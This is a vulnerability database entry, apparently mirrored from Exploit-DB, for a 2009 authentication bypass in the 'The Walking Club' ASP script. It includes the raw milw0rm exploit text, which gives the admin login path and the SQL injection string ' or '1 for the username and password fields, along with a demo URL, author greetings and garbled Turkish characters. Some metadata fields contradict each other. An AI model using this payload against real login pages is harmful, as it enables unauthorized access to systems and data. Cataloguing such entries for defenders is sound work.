The Walking Club (Auth Bypass)

vendor:

The Walking Club

by:

ByALBAYX

7.5

CVSS

HIGH

Authentication Bypass

287

CWE

Product Name: The Walking Club

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

The Walking Club (Auth Bypass)

The Walking Club is vulnerable to an authentication bypass vulnerability. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. This will allow the attacker to bypass the authentication process and gain access to the application.

Mitigation:

The vendor has released a patch to address this vulnerability. It is recommended to apply the patch as soon as possible.

Source

Exploit-DB raw data:

#----C4TEAM.ORG---ByALBAYX----C4TEAM.ORG----#
#############################################
[~]Author   : ByALBAYX

[~]Website  : WWW.C4TEAM.ORG
#############################################
[~]The Walking Club (Auth Bypass)

[~]Script        : The Walking Club

[~]Price         : $39   :) 

[~]Demo          : http://warhound.com/ASP/walking/login.aspx

[~]Details       : http://warhound.com/asp/products.htm
#############################################
[~]Admin     :  [PATH] /walking/login.aspx

[~]username  : ' or '1

[~]password  : ' or '1
#############################################
[~]Ä°ÅŸinize BaqÄ±n :=)

[~]Greetz For C4TEAM Members
#############################################
Derdimi dinledim, derdimden Ä°ÄžRENDÄ°M...
Onun derdini gÃ¶rdÃ¼m, derdime Ä°MRENDÄ°M...
----------
FilistiN

# milw0rm.com [2009-01-16]